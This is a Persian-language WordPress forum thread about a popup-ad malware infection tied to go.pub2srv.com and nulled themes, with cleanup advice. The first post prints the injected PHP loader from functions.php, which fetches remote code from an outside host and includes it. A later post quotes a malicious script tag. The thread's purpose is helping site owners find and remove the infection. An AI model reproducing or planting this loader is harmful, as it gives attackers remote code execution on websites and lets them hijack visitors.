آموزش های عمومیامنیتبخش وردپرسعمومیوردپرس

ویروس پاپ آپ وردپرس go.pub2srv.com

ویروس پاپ آپ وردپرس go.pub2srv.com
ویروس پاپ آپ وردپرس go.pub2srv.com
ویروس پاپ آپ وردپرس go.pub2srv.com
ویروس پاپ آپ وردپرس go.pub2srv.com
ویروس پاپ آپ وردپرس go.pub2srv.com

نوشته : master89

دوستان سلام

یک ویروس جدید اومده برای وردپرس که تبلیغات دزدید میکنه. به این صورت که پاپ آپ کلیکی باز میکنه و توی موبایل بدون کلیک پاپ آپ میذاره.

جالبش اینجاس که روی آی پی Admin وردپرس پاپ آپ نداره و حتی کد هم نمیتونید پیدا کنید!

شما میتونید از “پنجره ناشناس” فایرفاکس سایت خودتون رو باز کنید و کد و پاپ آپ رو ببینید. اما باز هم اگه با FTP برید داخل همون صفحه و بخواید کد رو پاک کنید. کد مخفی میشه. به این صورت که با هر بار بارگذاری صفحه کد از جایی بازخوانی میشه.

توی انجمن های فارسی که بحثی ازش نشده فکر کنم، توی انجمن های خارجی هم بحث شده اما جوابی دریافت نشده.

صفحه اصلی تبلیغ دزد: go.pub2srv.com هست. که هر بار لینک های تبلیغاتی متفاوتی همراه خودش میتونه داشته باشه. راه های زیادی برای از بین بردنش هست. اما باز بر میگرده و به مرور بیشتر میشه.

نکته آخر : این ویروس با قالب های نال شده و غیر قانونی وارد وبسایت شما میشه. معمولا هم ارائه دهنده این قالب ها سایت vestatheme هست که اکثر وبسایت هایی که قالب های تجاری رو رایگان برای دانلود میذارن، از این وبسایت دریافت میکنند (پس اکثر سایت ها خطرناک شدن)

آموزش حذف ویروس :

اول سایتتون رو اینجا وارد کنید و چک کنید

https://sitecheck.sucuri.net/

حالا برید داخل فلدر قالبتون / فایل function.php رو پیدا کنید و ویرایش کنید

و قطعه کد زیر رو ازش حذف کنید


if ( ! function_exists( 'wp_temp_setup' ) ) { 
$path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
if($tmpcontent = @file_get_contents("www.aotson.com/code.php?i=".$path))
{
function wp_temp_setup($phpCode) {
 $tmpfname = tempnam(sys_get_temp_dir(), "wp_temp_setup");
 $handle = fopen($tmpfname, "w ");
 fwrite($handle, "<?phpn" . $phpCode);
 fclose($handle);
 include $tmpfname;
 unlink($tmpfname);
 return get_defined_vars();
}
extract(wp_temp_setup($tmpcontent));
}
}
?>

حالا افزونه Exploit Scanner رو نصب کنید و اسکن کنید. پس از پایان اسکن ctrl f رو بزنید و go.pub رو جستجو کنید. اگر نبود، یعنی همه چیز درسته.

(این افزونه کد های مخفی رو پیدا میکنه و نمایش میده)

سپاس

نوشته : samen

سلام علیکم

سایت ما هم به این مسئله دچار شده و متأسفاه روشی که فرمودین جواب نداد (این سایت ماست)

اگه سورس قالب رو ملاحظه بفرمائید ظاهرا یک فایل جاوا اسکریپت هست که داره تبلیغات پاپ آپ میگیره و با آیدی ادمین سایت چیزی مشخص نیست فقط سایر کاربران می ببینند…

اینم فایل مخرب که البته با فاصله می نویسم تا گوگل صفحه رو بلاک نکنه:

<script src='h t t p s:// cdn. examhome. net/ cdn. j s ? v e r = 1 . 0 . 5 ' type='text/java s c r i p t'></script></p>

نوشته : mostafam6

سلام دوستان

من قالب انفولد دارم و و وقتی مطالب سایت و باز میکنم پاپ آپ سایتای مختلف مثل allow-space دات کام میاد بالا.تا الان چندبار کل فایلا رو پاک کردن و دوباره بک آپمو دیتابیس ریختم.با تمام آنتی ویروس ها هم چک کردم و هیچ مشکلی گزارش نمیشه.فایلهای فانکشن هم زیرو رو کردم کد نامربوطی پیدا نکردم.نمیدونم دیگه چیکار کنم.ممنون میشم اگه کسی بتونه راهنماییم کنه.

نوشته : Morteza

سلام

به انجمن خوش اومدین دوست عزیز

چون نسخه اصلی رو نصب نکردید و نسخه نال شده و پر از ویروس روی سرورتون هست.

نوشته : یونس

در در 1398/9/20 در 14:17، Morteza گفته است :
سلام
به انجمن خوش اومدین دوست عزیز
چون نسخه اصلی رو نصب نکردید و نسخه نال شده و پر از ویروس روی سرورتون هست.

نه اتفاقا من از قالب اصلی Divi استفاده می کنم و پلاگین نال شده ای هم نداشتم اما درگیر این مشکل شدم.

چهار تا فایل آلوده رو هم از طریق اسکن سمت سرور پیدا و حذف کردم و همینطور امنیت سایت رو هم بالا بردم و فایل های وردپرس رو هم جایگزین کردم ولی باز به مشکل برخوردم.

نوشته : Morteza

نسخه اصل رو از کجا گرفتین؟

نوشته : یونس

از خود شرکت الگانت تم به صورت مستقیم خریداری کردم.

نوشته : yazdaniwp

در 7 ساعت قبل، یونس گفته است :
از خود شرکت الگانت تم به صورت مستقیم خریداری کردم.

سلام. لزوما همیشه از قالب نیست، قالبهای پرفروش هدف هکرها هستن، ممکنه افزونه نال شده داشتید و یا حتی یکی از افزونه ها باگ داشته یا بروز نبوده. کلا باید بصورت مداوم وردپرس رو بررسی کنید و آخرین اخبار رو هم از مراجعی مثل وبسایت رسمی وردفنس دنبال کنید.


(1) افزونه ثبت نام پاپ آپ افزونه ورود پاپ
افزونه ثبت نام پاپ آپ افزونه ورود پاپ آپ افزونه کاربری و پروفایل وردپرس


(2) افزونه پاپ آپ Layered Popups - بیگ تم
افزونه پاپ آپ Layered Popups - بیگ تم


(3) افزونه پاپ آپ وردپرس Mango Popup
افزونه پاپ آپ وردپرس Mango Popup - افزونه وردپرس آذر وردپرس


(4) آموزش حذف ویروس پاپ آپ Ads by
آموزش حذف ویروس پاپ آپ Ads by OffersWizard با استفاده از نرم افزار قدرتمند AdwCleaner رایاتکنولوژی


(5) افزونه پاپ آپ ورود و ثبت نام در وردپرس
افزونه پاپ آپ ورود و ثبت نام در وردپرس


(6) شدن پنجره
کد پاپ آپ پشت صفحه 24 ساعته - کد باز شدن پنجره جدید - کد پاپ آپ وردپرس


(7) افزونه Layered Popups سابق افزونه
افزونه Layered Popups سابق افزونه Green Popups - راست چین


(8) افزونه وردپرس پاپ آپ عضویت در خبرنامه
افزونه وردپرس پاپ آپ عضویت در خبرنامه Master Popups-ملت وب

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

11 − سه =

دکمه بازگشت به بالا